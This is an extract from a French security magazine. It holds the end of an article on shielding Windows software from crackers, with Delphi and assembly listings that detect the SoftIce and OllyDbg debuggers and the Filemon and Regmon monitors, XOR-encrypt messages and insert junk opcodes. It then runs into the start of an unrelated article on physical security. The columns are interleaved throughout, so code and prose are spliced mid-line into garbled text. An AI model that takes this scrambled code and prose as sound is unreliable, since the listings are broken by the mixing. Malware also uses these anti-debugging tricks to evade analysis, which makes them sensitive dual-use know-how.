la fonction WinAPI – CreateFileA Une autre méthode pour détec- SoftIce, celui-ci ne sera pas appelé,
(voir le Listing 1). Si SoftIce (et plus ter un débogueur consiste à trouver ce qui vous permettra de détecter la
précisément sice.vxd) se trouve ses clés dans le registre système de présence du débogueur.
dans la mémoire, le système ne Windows. Tout comme les autres En ce qui concerne la fonction de
permettra pas d'ouvrir le pilote logiciels, SoftIce apporte lors de vérification, le mieux est de l'écrire

hakin9 N o 3/2005 www.hakin9.org 61

 en tant que partie assembleur dans
Listing 4. Appeler l'interruption INT 3 le code Delphi (Listing 4). Cette
var
méthode peut être également lé-
Conserver :pointer; gèrement modifiée de sorte que
l'interruption INT 3 soit appelé sans
begin EAX=4 et EBP=BCHK mais avec les
try
registres SI=FG et DI=JM – pour voir
asm
mov Conserver,esp ; la valeur du registre ESP est conservée
le code concerné, reportez-vous au
push offset @suivant ; le descripteur pour Listing 5.
; SetUnhandledExceptionFilter indique Pour détecter SoftIce, il est éga-
; où il faut aller si SI n'est pas détecté lement possible d'utiliser la méthode
call SetUnhandledExceptionFilter ; appeler l'exception
de communication du système avec
mov ebp,'BCHK' ; chargement de la valeur 'BCHK'
; dans le registre EBP
le débogueur. Appelons l'interruption
mov eax, 4 ; la valeur 4 est chargée INT 41 pour le registre EAX=4Fh (voir le
; dans le registre EAX Listing 6). Si SoftIce se trouve dans
INT 3 ; appeler l'interruption INT 3 le système, il reprendra la gestion de
Call ExitProcess ; quitter le logiciel
l'interruption et il entrera la valeur
; après avoir détecté SoftIce
0F386h dans EAX . Notez que cette va-
@suivant: ; c'est ici où l'on va si SoftIce
; n'est pas détecté leur est un identifiant du débogueur
mov esp, Conserver ; restaurer la valeur originale dans le système.
; du registre ESP En utilisant l'interruption INT
push offset @fin
68h, vous détecterez SoftIce de
ret
@fin:
la même manière. Celle-ci doit
ret être appelée pour l'état du registre
AH=43h. Si le débogueur se trouve
end; dans la mémoire, la valeur 0F386h
except end;
sera retournée dans le registre EAX
(voir le Listing 7).
Une autre méthode pour détec-
Listing 5. Une autre méthode pour détecter un débogueur en utilisant ter SoftIce consiste à utiliser IDT (en
l'interruption INT 3 anglais Interrupt Descriptor Table).
IDT est une table où les informations
var sur les interruptions sont stockées
Conserver :pointer;
(voir également l'article de Mariusz
begin
Burdach Quelques méthodes sim-
try ples pour détecter les débogueurs
asm et l'environnement VMware, hakin9
mov Conserver,esp ; la valeur du registre ESP est conservée 2/2005). Cela est requis par la
push offset @suivant ; descripteur pour
méthode de travail du système en
; SetUnhandledExceptionFilter
call SetUnhandledExceptionFilter ; appeler l'exception
mode protégé.
mov eax, 4 ; chargement de la valeur 4 dans EAX Le système Windows crée Inter-
mov si, 'FG' ; chargement de la valeur 'FG' rupt Descriptor Table pour 255 vec-
; dans le registre SI teurs d'interruptions. SoftIce utilise
mov di, 'JM' ; chargement de la valeur 'JM'
les interruptions INT 1 et INT 3. L'idée
; dans le registre DI
INT 3 ; appeler l'interruption INT 3
de cette méthode est de lire depuis la
Call ExitProcess ; quitter le logiciel si SoftIce table IDT les adresses des interrup-
; est détecté tions INT 3 et INT 1 et de soustraire
@suivant: ; c'est ici où l'on va si SI leurs valeurs l'une de l'autre. INT 3 a
Défense

; n'est pas détecté

la valeur 3115h et INT 1 – 30F7h. Après
mov esp, Conserver ; restaurer la valeur originale
; du registre ESP
les avoir soustrait l'une de l'autre,
push offset @fin vous obtenez la valeur 1Eh (voir le
ret Listing 8).
@fin:
ret
Que faire après la détection
end;
du débogueur ?
except end; Dans les premiers exemples, nous
présentons le message informant

62 www.hakin9.org hakin9 N o 3/2005

 Protection contre les pirates informatiques

l'utilisateur de la détection de Sof-

tIce. En réalité, vous devriez l'éviter Listing 6. Détection du débogueur à l'aide de l'interruption INT 41h
vu que c'est une facilité pour le pirate var
essayant de craquer votre logiciel. Conserver :pointer;
Après avoir reçu un tel message,
le pirate pourra rechercher dans le begin
try
code une chaîne texte parlant de la
asm
détection de SoftIce puis trouver et mov Conserver,esp ; la valeur du registre ESP est conservée
rendre inoffensif le moyen de sécuri- push offset @suivant ; descripteur pour
sation utilisé. ; SetUnhandledExceptionFilter
Le mieux est de ne pas informer call SetUnhandledExceptionFilter ; appeler l'exception
mov eax, 4Fh ; la valeur 4fh est chargée dans EAX
sur la détection du débogueur mais
int 41h ; appeler l'interruption INT 41h
d'utiliser un truc pouvant dérouter cmp eax, 0F386h ; comparer EAX avec 0F386h, si les
le voleur. Une bonne idée est de ; valeurs sont égales, SoftIce est détecté
charger les valeurs suivantes dans la jnz @suivant ; si elles ne sont pas égales
variable appropriée : ; (eax <> 0F386), le débogueur est absent
Call ExitProcess ; quitter le logiciel si SoftIce
; est détecté
• 1 – si le débogueur a été dé- @suivant: ; c'est ici où l'on va si SoftIce
tecté, ; n'est pas détecté
• 0 – si le débogueur n'est pas pré- mov esp, Conserver ; restaurer la valeur originale
sent. ; du registre ESP
push offset @fin
ret
Au démarrage du logiciel, il est @fin:
possible de vérifi er la valeur de ret
cette variable en appellant le bou- end;
ton Enregistrement, par exemple. except end;

Si celle-ci est égale à 1, l'applica-

tion cesse de fonctionner ou elle
cesse de réagir. Si cependant la
valeur est égale à 0, le logiciel Listing 7. Détection de SoftIce à l'aide de l'interruption int68h
marche de façon standard. Pour en
trouver un exemple, reportez-vous asm
mov ah, 43h ; chargement de la valeur 43h dans le registre AH
au Listing 9.
int 68h ; appeler l'interruption int68h
Où faut-il mettre les détecteurs cmp ax, 0F386h; comparer le contenu du registre AX avec la valeur 0F386h
de SoftIce ? La solution idéale est jnz @suivant ; s'il n'y a pas de zéro (AX <> 0F386h),
d'en avoir plusieurs et de les répar- ; SoftIce n'est pas détecté
tir dans des endroits différents du call ExitProcess ; quitter le logiciel

code et non pas dans la même par-

tie l'un à côté de l'autre. L'un peut
s'activer au démarrage du logiciel
et l'autre peut être caché derrière
le bouton d'enregistrement. Le fait
d'insérer ces fonctions l'une après
l'autre permettra au pirate de les
trouver facilement et de les rendre
impuissantes.
Détecter OllyDbg
Un autre débogueur populaire
s'appelle OllyDbg (voir la Figure 1).
Comme il marche dans l'environne-
ment fenêtres, vous pouvez le détec-
ter grâce à un texte figurant dans la
barre de titre de la fenêtre. C'est la
chaîne OllyDbg et vous la trouverez
en utilisant la fonction FindWindowEx
(voir le Listing 10).
@suivant: ; le logiciel continue à s'exécuter
ret
end;
Filemon et Regmon
Si vous utilisez dans votre logiciel le
fichier d'enregistrement ou si vous
enregistrez dans le registre Windows
les clés prouvant l'enregistrement du
logiciel, faites attention aux logiciels
tels que Filemon et Regmon. Le
premier enregistre tous les fichiers
ouverts et le second toutes les lignes
dans le registre.
Ces deux logiciels peuvent être
détectés de deux façons. L'une con-
siste à trouver le pilote dans la mé-
moire (Listing 11) et l'autre à détecter
la fenêtre (Listing 12).
En procédant de la même ma-
nière, il est possible de détecter
le logiciel Regmon. Pour cela,
il suffit de remplacer dans les lis-
tings le nom du fichier du pilote par
\.\REGVXD et le nom de la fenêtre par
Registry Monitor – Sysinternals:
www.siliconrealms.com .
Chiffrer une chaîne
de caractères
La plupart des messages impor-
tants dans votre application doi-
vent être chiffrés. Grâce à cela,
il sera plus difficile au pirate de

hakin9 N o 3/2005 www.hakin9.org 63

 trouver une bonne piste car au
Listing 8. Détection de SoftIce à l'aide de la table IDT lieu de Numéro de série invalide,
var
par exemple, il verra dans le code
IDT : integer; une chaîne de caractères sans
Conserver: pointer; signification comme, par exemple,
Űüđĺçôâüń&úâěµűŕřđçµćđçě˙űě.
begin
Sur le Listing 13, vous voyez
try
asm
un petit programme permettant de
chiffrer une chaîne de caractères
mov Conserver,esp ; la valeur du registre ESP est conservée choisie. La fonction d'encryptage
push offset @suivant ; descripteur pour étant très simple n'utilise que l'ins-
; SetUnhandledExceptionFilter
truction xor. Bien sûr, il est possible
call SetUnhandledExceptionFilter ; appeler l'exception
sidt fword ptr IDT ; lecture de la table IDT
de l'améliorer mais n'oubliez pas que
mov eax, dword ptr [IDT+2] ; chargement dans EAX votre objectif principal est de rendre
add eax,8 la chaîne texte illisible et que grâce
mov ebx, [eax] ; EBX = INT1 aux propriétés de l'instruction xor,
add eax, 16
vous ne serez pas obligé d'écrire la
mov eax, [eax] ; EAX = INT3
and eax, 0ffffh
fonction d'inversion.
and ebx, 0ffffh Pour utiliser la fonction d'en-
sub eax, ebx ; soustraire INT 1 de INT 3 cryptage, essayons de chiffrer un
cmp eax, 01eh ; si EAX = 01Eh, SoftIce est détecté texte (Numéro de série invalide, par
jnz @suivant ; si EAX <> 0, le débogueur
exemple) et mettons en pratique le
; n'est pas détecté
call ExitProcess ; quitter le logiciel
résultat obtenu dans le logiciel (voir
@suivant: ; c'est ici où l'on va le Listing 14). Dans le désassem-
; si SoftIce n'est pas détecté bleur, le pirate verra la chaîne de
mov esp, Conserver ; restaurer la valeur originale caractères Űüđĺçôâüń&úâěµűŕřđç
; du registre ESP
µćđçě˙űě au lieu de la chaîne texte
push offset @fin
ret
Numéro de série invalide. Ainsi,
@fin: vous devez chiffrer les messages
ret concernant l'enregistrement ou
end; la protection du logiciel. Pour les
autres messages, il vaut mieux de
except end;
ne pas les chiffrer car cela pourrait
éveiller les soupçons du pirate.

Listing 9. La procédure à appliquer en cas de détection du débogueur Dummy opcodes,

var variable: byte; à savoir comment
procedure verifier
rendre le code illisible
begin
Dummy opcodes peuvent être dé-
finies tout simplement comme des
if instructions sans tâches à effectuer
CreateFileA('\\.\SICE', GENERIC_READ or GENERIC_WRITE, n'ayant pour but que de salir le code
FILE_SHARE_READ or FILE_SHARE_WRITE, nil, OPEN_EXISTING,
du logiciel. Cependant, elles sont
FILE_ATTRIBUTE_NORMAL, 0) <> INVALID_HANDLE_VALUE
then
une arme efficace dans le combat
begin contre les pirates. Si vous utilisez
variable:=1 les junks dans votre code (c'est une
end; autre appellation pour les instruc-
Défense

end;
tions de ce type), le pirate verra lors
{........partie suivante du logiciel......}
du déboguage le code qui ne lui per-
mettra pas l'interprétation détaillée
procedure TForm1.enregistrementClick(Sender: TObject); des instructions importantes. Le
begin code débogué sera si sali qu'il serait
if variable=1 then
très difficile d'y trouver les instruc-
ExitProcess(0);
{si la variable n'est pas égale à 1, vous pouvez continuer}
tions standard.
end; Le craquage du logiciel sans
supprimer les junks est un vrai

64 www.hakin9.org hakin9 N o 3/2005

 Protection contre les pirates informatiques

défi. Grâce à cela, vous gagnez du

temps et le pirate perd patience. Listing 10. Détection du débogueur OllyDbg
En plus, le désassembleur ne se if
débrouille pas bien avec les junks. FindWindowEx(0,0,0, ‘OllyDbg') <> 0
Le code est toujours peu lisible. then
Pour utiliser les dummy opcodes begin
ExitProcess(0);
dans votre logiciel, servez-vous
end;
des instructions assembleur. Voici
un exemple :
Listing 11. Détection du logiciel Filemon grâce à son pilote
asm
db $EB, $02, $CD, $20 if
end; CreateFileA(' \\.\FILEVXD', GENERIC_READ or GENERIC_WRITE,
FILE_SHARE_READ or FILE_SHARE_WRITE, nil, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, 0) <> INVALID_HANDLE_VALUE
Ce junk , donné en exemple, était uti- then
lisé autrefois dans les exe-protectors begin
professionnels (logiciels ayant pour ExitProcess(0);
but de sécuriser les fichiers exécu- end;

tables PE dans Windows). Sous la

forme assembleur standard, il se
présenterait ainsi : Listing 12. Détection de la fenêtre du logiciel Filemon

jmp $+4 if
FindWindowEx(0,0,0, §
int 20h
'File Monitor - Sysinternals: www.sysinternals.com') <> 0
then
Les instructions de type jmp $(+/- begin
nombre) permettent de se déplacer ExitProcess(0);
d'un nombre des octets donné (en end;

avant ou en arrière en fonction de +

ou -). Grâce à cela, les opcods sont
interprétés de mauvaise façon et le Listing 13. Fonction d'encryptage affichant une chaîne texte
code devient compliqué. Essayez de
déboguer vous-même du code com- function encryptage(text:string):string;
var t:integer;
prenant ce type d'instructions pour
ch:char;
comprendre comment cela marche by:byte;
en pratique. tmp:string;
Cependant, vous devez savoir afficher:string;
où et comment insérer les junks. begin
for t:=1 to length(text) do
Tout d'abord, il faut que ceux-ci
begin
soient utilisés en grand nombre by:=ord(text[t]);
dans le code vérifiant le numéro by:=by xor $2F;
de série de votre logiciel. En outre, by:=by xor $10;
il est possible de les mettre dans les by:=by xor $AA;
ch:=char(by);
messages informant sur l'expiration
tmp:=tmp+ch;
du délai d'utilisation du logiciel end;
ou pour vérifier la présence d'un afficher:=tmp;
débogueur. L'exemple d'utilisation showmessage(afficher);
des opcodes est présentée sur le
Listing 15.
Il faut dire que l'utilisation ci-des- Listing 14. Utiliser une chaîne texte chiffrée dans le message
sus des junks est peu confortable.
C'est pourquoi, il est possible de if
Registration = 0
créer un fichier comme, par exem-
then
ple, dummy.jnk, d'y déclarer votre begin
insertion et de mettre le nom du fi - encryptage('Űüđĺçôâüń&úâěµűŕřđçµćđçě˙űě ');
chier : {$I dummy.jnk} devant chaque end;
instruction.

hakin9 N o 3/2005 www.hakin9.org 65

 les différents trucs. Une méthode
Listing 15. Utilisation des dummy opcodes dans le code efficace consiste à insérer un code
asm db $EB, $02, $CD, $20 end;
supplémentaire faux, responsable
asm db $EB, $02, $CD, $20 end; de l'enregistrement (faux bien évi-
asm db $EB, $02, $CD, $20 end; demment).
Vous pourrez, par exemple, met-
if Registered = 1
tre en pratique une longue fonction
then
begin
de vérification qui, en cas de cra-
MessageBox(0,PChar('Merci de vous avoir enregistré!'), quage, affichera un message non
PChar('Info'),MB_ICONINFORMATION); chiffré sur l'enregistrement réussi.
end; Le pirate penserait que le logiciel est
craqué tandis que vous changeriez
asm db $EB, $02, $CD, $20 end;
asm db $EB, $02, $CD, $20 end;
seulement la chaîne unregistered
asm db $EB, $02, $CD, $20 end; par registered to: xxx sans déver-
rouiller en même temps les fonctions
indisponibles dans la version d'éva-
Listing 16. Utilisation d'un fichier externe en vue de dérouter le pirate luation.
Une autre méthode consiste
if à utiliser un fichier externe. Si dans
CreateFileA('register.dat', GENERIC_READ or GENERIC_WRITE,
le répertoire de l'application, il n'y
FILE_SHARE_READ or FILE_SHARE_WRITE, nil, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, 0) = INVALID_HANDLE_VALUE
a pas de fichier approprié comme,
then par exemple, register.dat, le logiciel
begin passe à la fausse procédure vérifiant
aide:= 1 le numéro de série ou il ferme tout de
end;
suite la fenêtre d'enregistrement (voir
{........partie suivante du logiciel......}
procedure TForm1.enregistrementClick(Sender: TObject);
le Listing 16).
begin
if aide = 1 then La course au temps
begin Les méthodes que vous avez vues
FakeProcedure;
vous permettent de prolonger la
end;
{si la variable n'est pas égale à 1,
protection de votre logiciel – le
la vérification est effectuée de façon standard} pirate devra y consacrer plus de
RegistrationProc; temps. En outre, vous pouvez uti-
end; liser les exe-protectors qui sont
vraiment très nombreux. Parmi
eux, il y a, entre autres, les logiciels
Les dummy opcodes sont une Soyez cependant prudent car leur ASProtect ou Armadillo. PESpin
bonne méthode pour se protéger mauvaise création peut contribuer est un bon protecteur gratuit polo-
contre les pirates et c'est pourquoi, au plantage du logiciel. nais (voir le cadre Sur le réseau).
il est bien d'en utiliser plusieurs. Le logiciel où vous utiliserez aussi
La taille du code n'augmentera Astuces finales bien vos propres moyens de sécu-
pas considérablement et votre En sécurisant votre logiciel con- risation qu'exe-protector aura des
protection sera efficace. Le mieux tre les pirates, pensez avant tout chances d'échapper aux tentatives
est d'associer les différents junks à les dérouter. Pour cela, utilisez de craquage. n
les uns avec les autres – créer,
par exemple, trois junks différents
et utiliser l'un ou l'autre ou l'un Sur le réseau :
après l'autre. Voici deux autres
Défense

• http://www.pespin.w.interia.pl/ – le logiciel PESpin,

dummy opcodes :
db $EB, $02, $25, $02, $EB, $02,
$17, $02, $EB, $02, $AC, $F9,
$EB, $02, $F1, $F8
db $E8,$01,$00,$00,$00,$33,$83,$C4,$04
Vous pouvez expérimenter vous-mê-
me en inventant vos propres junks.
• http://www.pelock.com/ – le logiciel PELock,
• http://www.sysinternals.com/ – les logiciels Filemon et Regmon,
§ • http://home.t-online.de/home/Ollydbg/ – le débogueur OllyDbg,
§ • http://www.aspack.com/asprotect.html – le site du logiciel ASProtect,
• http://www.compuware.com/products/devpartner/bounds.htm – le projet Bounds
Checker,
• http://www.siliconrealms.com/ – le protecteur Armadillo,
• mailto: jakub-nowak@o2.pl – contacter l'auteur.

66 www.hakin9.org hakin9 N o 3/2005

 Conception de systèmes
de sécurité physique
Jeremy Martin
E
n pleine nuit, un couloir vide résonne
du son de verres brisés, suivi du bruit
étouffé de pas se dirigeant vers la salle,
sans surveillance, où se trouvent les serveurs.
Quelques minutes plus tard, on peut entendre un
véhicule qui s'éloigne rapidement. Le lendemain
matin, la première personne entrant dans l'im-
meuble signale à la police une fenêtre cassée.
Quelques heures plus tard, les inspecteurs cons-
tatent que rien n'a été volé et classent l'incident
dans la catégorie du vandalisme aléatoire.
Deux mois après l'incident, le PDG, hors de
lui, réunit en urgence ses collaborateurs après
avoir pris connaissance, dans un magazine
commercial, d'informations aux conséquences
dévastatrices pour sa société. La concurrence
vient de lancer sur le marché un produit identi-
que à celui que sa société a développé à coût
Défense
de plusieurs millions d'euros. Le cambriolage
d'il y deux mois était finalement bien plus que
du simple vandalisme mais s'avère être de
l'espionnage industriel. Selon des spécialistes
indépendants de la sécurité, le cambrioleur a
utilisé un CD ROM Linux auto-bootable pour
court-circuiter les contrôles de sécurité pré-
sents, puis a tout simplement copié les secrets
de fabrication, pour finalement partir sans lais-
68 www.hakin9.org
Dépenser de l'argent dans la
protection de données pouvant
être recréées ne présente
aucun intérêt ; que pourrait-
il se passer concrètement ?
– des commentaires de ce genre
émanent d'un trop grand nombre
de cadres issus des hautes
sphères dirigeantes. Du mauvais
emploi de la part de l'employé
à l'espionnage industriel, en
passant par les catastrophes
naturelles, il existe une grande
variété de menaces dirigées
contre les actifs d'une société.
ser de traces. Tout ceci aurait pu être évité si
seulement des contrôles appropriés avaient été
mis en place.
Le présent article a pour objectif de pré-
senter certains problèmes liés à la sécurité
physique et la façon de minimiser les mena-
ces internes grâce à l'installation de contrôles
d'accès. Seront uniquement évoquées ici les
Cet article explique...
• la plupart des menaces communes visant la
sécurité des entreprises,
• la façon de protéger votre organisation ainsi
que vos données contre les menaces physi-
ques,
• la façon d'élaborer une politique de sécurité
physique.
Ce qu'il faut savoir...
• vous devriez idéalement posséder une expé-
rience en gestion des ressources humaines,
• vous devriez parallèlement connaître les ba-
ses en matière de conception de procédures
de sécurité technique.
hakin9 N o 3/2005

procédures d'entreprises. Toutefois,
toute suggestion est digne d'intérêt,
tant pour les entreprises commercia-
les que pour les individus.
Les contrôles d'accès, il est utile
de s'en souvenir, se déclinent en
trois branches : physiques, adminis-
tratives et techniques.
Les contrôles d'accès
physiques
Selon le site Web du Ministère de
l'Énergie des États-Unis, « Par
sécurité physique, on entend tout
d'abord la protection physique des
informations sensibles et protégées,
du personnel, des installations, ou
de tout autre matériel sensible, des
ressources, ou l'ensemble des pro-
cessus visant à se défendre contre
les activités d'espionnage criminel-
les, terroristes, ou hostiles ».
À propos de l'auteur
Fort de plus de 10 ans d'expérience
dans le secteur des Technologies de
l'Information (références : CISSP, IS-
SMP, ISSAP, CHS-III, CEI, CEH, CC-
NA, Network+, A+), Jeremy Martin est
aujourd'hui directeur de la communica-
tion pour la société PLUSS SA. Il est
également membre de diverses organi-
sations dont l'ACFEI (American College
of Forensic Examiners International, ou
École Internationale Américaine des
Examinateurs Médico-Légaux), la
BECCA (Business Espionage Controls
and Countermeasures Association, ou
Association des Contre-mesures et
Contrôles de l'Espionnage Industriel),
(ISC)² – de l'International Information
Systems Security Certification Con-
sortium, ou Consortium International
de Certification pour la Sécurité des
Systèmes d'Information, de l'ISACA
(Information Systems Audit and Con-
trol Association, ou Association pour
le Contrôle et l'Audit des Systèmes
d'Information), de l'ISSA (Information
Systems Security Association, ou
Association pour la Sécurité des Sys-
tèmes d'Information), du YEN NTEA
(Young Executives Network, ou Réseau
des Jeunes Cadres Dirigeants) et enfin
du OISSG (Open Information Systems
Security Group, ou Groupe pour la
Sécurité des Systèmes d'Information
Ouverts).
hakin9 N o 3/2005
Il nous faut tout d'abord définir
la nature des différentes menaces
physiques existantes :
• menaces émanant des individus
– pertes, grèves, maladies etc.,
• sabotage et vandalisme,
• pannes matérielles,
• catastrophes naturelles – tor-
nades, tremblements de terre,
inondations etc.,
• catastrophes induites par l'hom-
me – terrorisme, incendies volon-
taires, explosions,
• pertes liées aux installations
électriques, systèmes de chauf-
fage, de ventilation et de clima-
tisation, inondations.
Une fois ces menaces bien en tête,
il devient possible d'évaluer la meilleu-
re protection des actifs. Par exemple :
dans le cas d'une perte de courant,
vous pouvez vous doter d'un géné-
rateur de rechange afin de garantir
la bonne exécution des systèmes cri-
tiques, l'éclairage pour les employés,
ainsi que la disponibilité du système
de téléphone numérique. Dans le cas
d'une panne de matériel, il est fort pro-
bable que vous souhaitiez épargner
les pièces disponibles ou souscrire
à un contrat de maintenance avec un
fournisseur pour un remplacement im-
médiat. Il vous faut également garder
à l'esprit la réglementation relative
à votre secteur d'activité ou les lois
territoriales qui vous assurent une
certaine couverture tout en exigeant
certaines mises en conformité. Voici
les réglementations les plus connues
dans le secteur relatif à la sécurité des
Technologies de l'Information (voir
également l'Encadré Sur le réseau) :
• La loi HIPAA représente l'arti-
cle 104-191 du droit public des
États-Unis : Health Insurance
Portability and Accountability
Act of 1996 (soit la Loi relative
à la Responsabilité et au Trans-
fert de l'Assurance Maladie, en
français). Cette loi couvre les
organisations qui dispensent des
soins médicaux telles que les
hôpitaux, les cliniques, les com-
pagnies d'assurance, et même
www.hakin9.org
Sécurité physique
les personnes offrant leur propre
assurance.
• La loi SOX représente la Loi
américaine Oxley-Sarbannes de
2002 ; il s'agit d'une réponse lé-
gislative à l'encontre du scandale
comptable provoqué par la faillite
récente de sociétés ouvertes
cotées en Bourse. La loi SOX
exige une certaine conformité
ainsi qu'une réforme complète
et détaillée des procédures
comptables à l'encontre des
sociétés dites ouvertes (faisant
appel public à l'épargne) afin de
diffuser et d'améliorer la qua-
lité ainsi que la transparence des
rapports financiers tenus par des
auditeurs indépendants à la fois
internes et externes à la société.
• La loi GLBA représente la Loi
américaine Gramm-Leach-Bliley
de 1999 ; La Loi relative à la
Modernisation des Finances de
1999, également connue sous
le nom de Loi Gramm-Leach-
Bliley ou Loi GLB, comprend des
dispositions visant à protéger
les informations financières per-
sonnelles des consommateurs
détenues par les institutions
financières. Il existe trois parties
principales qui énoncent les exi-
gences liées au respect de la vie
privée : la Financial Privacy Rule
(soit la Règle sur les Données Fi-
nancières Privées, en français),
Safeguards Rule (soit la Règle
relative à la Sauvegarde, en
français) et Pretexting Provisions
(des dispositions annexes).
Les contrôles physiques ne sont que
des mécanismes conçus dans le but
de minimiser le risque d'une menace.
L'installation d'un verrou sur une porte
suffit à décourager un voleur potentiel.
L'étape suivante consisterait à ajouter
un verrou biométrique tel qu'un nu-
mériseur d'empreintes de manière
à rendre l'accès à une zone sécurisée
plus difficile pour un intrus déterminé.
Ce temps supplémentaire est parfois
suffisant aux autorités pour éliminer
une menace. Les portes ne sont pas
les seuls éléments susceptibles d'être
verrouillés. Les ordinateurs portables,
69
 les ordinateurs, et les bâtis de ser-
veurs devraient également faire l'objet
de telles considérations. Nul ne con-
naît jamais le moment où un parfait
étranger pénètrera dans vos locaux,
agira comme un de vos employés,
pour en sortir muni d'un ordinateur
portable de votre société ou de tout
autre actif de valeur. Or, ce genre d'in-
trusion se manifeste bien plus souvent
que l'on pourrait le croire.
Les stations de travail
De nombreuses sociétés sont allées
jusqu'à supprimer l'ensemble des
lecteurs de disques, la possibilité
d'avoir recours aux dispositifs de type
USB/COM/LPT, ainsi que les mots de
passe chargés de protéger le système
BIOS des stations de travail afin d'évi-
ter l'installation de programmes, des
utilisations non autorisées, et le vol.
Un des scénarii de protection consiste
à avoir recours au Windows 2003 Ter-
minal Server ainsi qu'à une distribu-
tion Linux bootable personnalisée. Si
la configuration est préétablie et si le
réseau n'utilise pas de serveur DHCP,
il est censé être plus difficile de forcer
le système. En même temps on résout
les problèmes avec des spyware, des
malware et des virus.
La sécurité physique doit éga-
lement prendre en considération,
à un niveau supérieur, la protection
des données dites sensibles contre
la surveillance connue sous le nom
de TEMPEST (cf. l'article de Robin
Lobel TEMPEST – Émissions com-
promettantes dans ce numéro de ha-
kin9) – ainsi que la protection contre
la capture des fuites de radiations
électromagnétiques. La technolo-
gie de surveillance du programme
TEMPEST décode les informations
dans un format utilisable pouvant
être reproduites à distance. Cette
surveillance peut être évitée en ins-
Défense
tallant des matériaux spéciaux au
sein des locaux lors de la construc-
tion de l'espace protégé et/ou des
boîtiers spéciaux destinés à abriter
les systèmes informatiques.
La protection des locaux
L'installation d'un sas ou d'un jeu de
double portes à l'entrée de vos locaux
70
ou des zones sécurisées s'avère être
une bonne solution interdisant l'entrée
ou la sortie des personnes non autori-
sées sans avoir été au préalable iden-
tifiées et enregistrées. Clôturer les
périmètres d'accès joue également
un rôle important dans l'interdiction
et la détection des accès non autori-
sés avant que des intrus ne pénètrent
dans vos locaux. Les clôtures se dé-
clinent en différentes solutions :
• entre 1 et 1,20 mètres de hauteur
afin de décourager de simples
intrus,
• entre 1,8 et 2 mètres de hauteur
découragent la plupart des vo-
leurs potentiels,
• 2,50 mètres recouvertes de
feuillards décourageront tout le
monde mis à part de véritables
intrus déterminés.
Les clôtures évoluent aujourd'hui
vers les clôtures PIDAS. PIDAS est
l'acronyme de Perimeter Intrusion
Detection and Assessment System
(que l'on pourrait traduire par Sys-
tème d'Évaluation et de Détection
d'Intrusion sur le Périmètre). Cette
clôture est dotée de capteurs placés
sur ses fils de fer ainsi qu'à sa base.
Ce système est conçu dans le but de
détecter les coupures dans les fils
de fer et les vibrations potentielles,
provoquées par l'escalade.
L'éclairage est souvent négligé
comme moyen de sécuriser une zone
donnée. Lorsqu'une zone est bien
éclairée, les risques d'intrusions sont
réduits par crainte d'être vu. L'éclairage
aide également les surveillants ainsi
que le matériel de surveillance à dé-
tecter une action malveillante en cours.
Le National Institute of Standards and
Technology, également connu sous le
nom de NIST (ou l'Institut National des
Normes et de la Technologie, en fran-
çais), déclare que les zones critiques
devraient être éclairées à 2,5 mètres
de haut au moyen de deux lampes.
Les contrôles d'accès
administratifs
Considérons maintenant les person-
nes en qui vous placez votre con-
fiance. Qu'en est-il des employés ?
www.hakin9.org
La partie la plus importante de tout
dispositif de sécurité est sans aucun
doute le personnel. La sécurité hu-
maine devrait toujours être considé-
rée en premier lieu. Le personnel est
également le maillon faible dans tout
dispositif de sécurité – le facteur hu-
main présente bien plus de variables
que tout autre élément. Ignorer les
politiques et les procédures de sé-
curité du personnel peut se révéler
tout aussi dangereux qu'une attaque
volontaire de la part d'un employé
mécontent. Malheureusement, les
attaques internes représentent la
menace la plus répandue et sont les
moins abordées (pour de nombreu-
ses raisons). C'est la raison pour la-
quelle les contrôles d'accès doivent
être installés et développés au sein
d'une politique complète et détaillée.
Les contrôles dits administratifs
comprennent la formation, les me-
sures d'urgence et les contrôles du
personnel. La formation permet aux
utilisateurs d'identifier de possibles
menaces tout en leur fournissant les
informations nécessaires pour agir
en conséquence. Lors d'un incendie,
par exemple, le personnel – s'il est
entraîné correctement – devrait être
familier avec les issues de secours
et le point de rassemblement. La
formation permet également aux
utilisateurs de repérer des attaques
non techniques telles que l'ingénierie
sociale dans la mesure où ils con-
naissent la véritable nature de ces
attaques. Pour les personnes char-
gées des mesures d'urgence, des po-
litiques définies devraient les aider à
minimiser les dégâts en cas de crise.
Les contrôles du personnel doi-
vent être envisagés sous forme de
mesures préventives et de bonnes
pratiques. Avant d'embaucher un futur
employé, les références de ce dernier
doivent être croisées avec d'autres
informations pertinentes afin d'éva-
luer le risque potentiel pour la société
que pourrait représenter la personne
en question. Une fois la personne
intégrée à la société, celle-ci devrait
progresser en suivant un ensemble
d'examens prédéfinis afin de mainte-
nir une conformité des deux parties,
en effectuant une rotation des pos-
hakin9 N o 3/2005
 Sécurité physique

Exemple d'une politique de sécurité physique

1. Présentation générale
Les intentions de la société Insecure Company, Ltd. de publier
une Politique de Sécurité Physique n'ont pas pour objectif d'im-
poser des restrictions contraires à la culture depuis longtemps
établie d'ouverture, de confiance mutuelle et d'intégrité de la so-
ciété Insecure Company, Ltd. Cette société s'est engagée à pro-
téger ses employés, ses partenaires commerciaux et la société
elle-même contre des actions illégales ou dommageables me-
nées par des individus, de manière volontaire ou involontaire.
Un système de sécurité efficace implique l'effort d'une équi-
pe soutenue par la participation et le soutien de chaque employé
de la société Insecure Company, Ltd. et de leur collaborateur. Il
est de la responsabilité de chaque employé ou hôte de connaître
ces lignes directrices, et de mener leur activité en conséquence.
2. Objectif
Cette politique a pour objectif d'exposer les grandes lignes de
la conception du plan de sécurité physique chez Insecure Com-
pany, Ltd. Ces règles sont mises en place dans le but de protéger
les employés ainsi que la société Insecure Company, Ltd.
3. Domaine d'application
Cette politique s'applique aux employés, fournisseurs, consul-
tants, employés temporaires, et hôtes de la société Insecure
Company, Ltd., y compris à l'ensemble du personnel associé
à des tiers.
autour des salles des serveurs ou des équipements, des labora-
toires d'essais et d'autres zones où sont utilisées ou stockées des
informations sensibles ou confidentielles ou des actifs.
L'entrée dans une zone sécurisée au moyen de références
non assignées à des individus spécifiques est strictement inter-
dite. L'entrée dans une zone sans identification appropriée ou en
l'absence d'autorisation est également interdite.
La sécurité physique implique également une planification
soigneuse des installations de manière à toujours garantir la con-
formité des zones verrouillées ou isolées aux exigences d'issues
de secours et de lutte contre les incendies.
Les barrières de périmètre devraient être un système PIDAS
contrôlé par surveillance extérieure évaluée pour des conditions
de faible éclairage.
La vidéo et autres formes électroniques de surveillance,
